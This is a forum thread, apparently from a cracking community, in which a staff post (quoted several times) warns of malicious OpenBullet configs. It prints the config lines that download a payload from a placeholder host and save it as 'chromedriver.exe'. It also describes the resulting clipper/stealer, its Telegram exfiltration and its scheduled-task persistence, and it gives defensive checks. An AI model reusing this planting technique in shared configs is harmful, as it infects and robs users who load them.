Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 261634

Beware of malicious/infected configs

by Liars - 23 June, 2020 - 10:18 AM
This post is by a banned member (P6AK) - Unhide
P6AK  
Registered
326
Posts
117
Threads
4 Years of service
#9
With this I also recommend only using .anom configs due to encryption through .loli and .loliX to hide this malware!
 
[Image: bXABN2d.gif] CLICK ME 
[Image: tGHNWQR.png]
[Image: Z8rHRHx.png]
This post is by a banned member (kobra) - Unhide
kobra  
Infinity
82
Posts
18
Threads
5 Years of service
#10
Thank you very much for the information
This post is by a banned member (noarch) - Unhide
noarch  
Supreme
532
Posts
293
Threads
6 Years of service
#11
(23 June, 2020 - 10:18 AM)Ulysses Wrote: Show More
We have noticed an increased volume of malicious OpenBullet configs lately.
Like many other malware-related incidents, the attacker uses compromised accounts to spread and to reply to their threads.
Unlike other malware, a malicious config won't have any detection on VirusTotal because there is no code being executed; it's text.
In other words, VirusTotal isn't aware that your config will be loaded on OpenBullet, and it will be translated to a set of instructions.

The malware attack vector is a malicious GET request, and it looks like this:
Code:
REQUEST GET "https://site.com/config/API"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
-> FILE "bin/chromedriver.exe"

The GET request leads to the payload "API" being downloaded with no extension, in the folder "bin" and then renamed to "chromedriver.exe".
So far, we have seen this malware change the victim clipboarded Bitcoin address (clipper) and read numerous files containing system information (stealer).
The malware logs the victim IP address and sends the stolen data to a Telegram bot. Persistence is granted through a task on the Windows Task Scheduler.

At any time, the malware may change depending on the attacker needs. Here are a few steps you can take to step up your security:

(1) Enable Two Factor Authentication. It will prevent your account from being accessed if your logins have been stolen.
(2) Do not access Cracked on a virtual machine, or a remote desktop, where you usually run potentially malicious files.
(3) Read your config with any text editor to check for any malicious requests, like malware (GET requests) or hitloggers (POST requests).

Last but not least, report malicious configs.

Thanks for the info.
[Image: ffdw3.gif]
This post is by a banned member (SHAMASH) - Unhide
SHAMASH  
Supreme
241
Posts
63
Threads
6 Years of service
#12
Thanks for alert.. i suggest to make the configs section only for members with enough likes or reputation or rank. to make the content quality clean and safe.
Hans SIGNATURE HERE :ricardo:

Staff Team || Leeching || Upgrade || Help Guide || Ranks
This post is by a banned member (montyPY) - Unhide
montyPY  
Registered
44
Posts
4
Threads
4 Years of service
#13
(This post was last modified: 24 June, 2020 - 03:16 PM by montyPY.)
I remember reporting such a config and the poster didnt even get a ban.
This post is by a banned member (warsnoop) - Unhide
warsnoop  
Supreme
963
Posts
132
Threads
4 Years of service
#14
(23 June, 2020 - 10:18 AM)Ulysses Wrote: Show More
We have noticed an increased volume of malicious OpenBullet configs lately.
Like many other malware-related incidents, the attacker uses compromised accounts to spread and to reply to their threads.
Unlike other malware, a malicious config won't have any detection on VirusTotal because there is no code being executed; it's text.
In other words, VirusTotal isn't aware that your config will be loaded on OpenBullet, and it will be translated to a set of instructions.

The malware attack vector is a malicious GET request, and it looks like this:
Code:
REQUEST GET "https://site.com/config/API"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
-> FILE "bin/chromedriver.exe"

The GET request leads to the payload "API" being downloaded with no extension, in the folder "bin" and then renamed to "chromedriver.exe".
So far, we have seen this malware change the victim clipboarded Bitcoin address (clipper) and read numerous files containing system information (stealer).
The malware logs the victim IP address and sends the stolen data to a Telegram bot. Persistence is granted through a task on the Windows Task Scheduler.

At any time, the malware may change depending on the attacker needs. Here are a few steps you can take to step up your security:

(1) Enable Two Factor Authentication. It will prevent your account from being accessed if your logins have been stolen.
(2) Do not access Cracked on a virtual machine, or a remote desktop, where you usually run potentially malicious files.
(3) Read your config with any text editor to check for any malicious requests, like malware (GET requests) or hitloggers (POST requests).

Last but not least, report malicious configs.

I dont understand how does the exe file auto executes ??
 
This post is by a banned member (Ulysses) - Unhide
This post is by a banned member (warsnoop) - Unhide
warsnoop  
Supreme
963
Posts
132
Threads
4 Years of service
#16
(24 June, 2020 - 09:27 PM)Ulysses Wrote: Show More
(24 June, 2020 - 09:06 PM)Warsnooop Wrote: Show More
(23 June, 2020 - 10:18 AM)Ulysses Wrote: Show More
We have noticed an increased volume of malicious OpenBullet configs lately.
Like many other malware-related incidents, the attacker uses compromised accounts to spread and to reply to their threads.
Unlike other malware, a malicious config won't have any detection on VirusTotal because there is no code being executed; it's text.
In other words, VirusTotal isn't aware that your config will be loaded on OpenBullet, and it will be translated to a set of instructions.

The malware attack vector is a malicious GET request, and it looks like this:
Code:
REQUEST GET "https://site.com/config/API"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
-> FILE "bin/chromedriver.exe"

The GET request leads to the payload "API" being downloaded with no extension, in the folder "bin" and then renamed to "chromedriver.exe".
So far, we have seen this malware change the victim clipboarded Bitcoin address (clipper) and read numerous files containing system information (stealer).
The malware logs the victim IP address and sends the stolen data to a Telegram bot. Persistence is granted through a task on the Windows Task Scheduler.

At any time, the malware may change depending on the attacker needs. Here are a few steps you can take to step up your security:

(1) Enable Two Factor Authentication. It will prevent your account from being accessed if your logins have been stolen.
(2) Do not access Cracked on a virtual machine, or a remote desktop, where you usually run potentially malicious files.
(3) Read your config with any text editor to check for any malicious requests, like malware (GET requests) or hitloggers (POST requests).

Last but not least, report malicious configs.

I dont understand how does the exe file auto executes ??

OpenBullet uses chromedriver.exe.

Oh so everytime we run openbullet it will execute Damnnn The guy who got the idea is a Big Brainn xD
 

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 28 Guest(s)